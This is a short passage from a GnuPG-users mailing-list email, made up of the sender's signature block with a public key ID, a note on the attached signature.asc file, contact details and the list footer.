encryption and signing. If you want some privacy, my public key ID is 2F9D4F14. The file singature.asc this message includes contains a cryptographic signature which enables you to verify this E-Mail really was written by me. Christopher Beck Gerhart-Hauptmann-Str. 1 91058 Erlangen Tel.: 09131 / 9245437 Fax.: 09131 / 8148708 Jabber: bec...@jabber.org EPVPN: (+49 221 59619) - 5232 signature.asc Description: This is a digitally signed message part. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users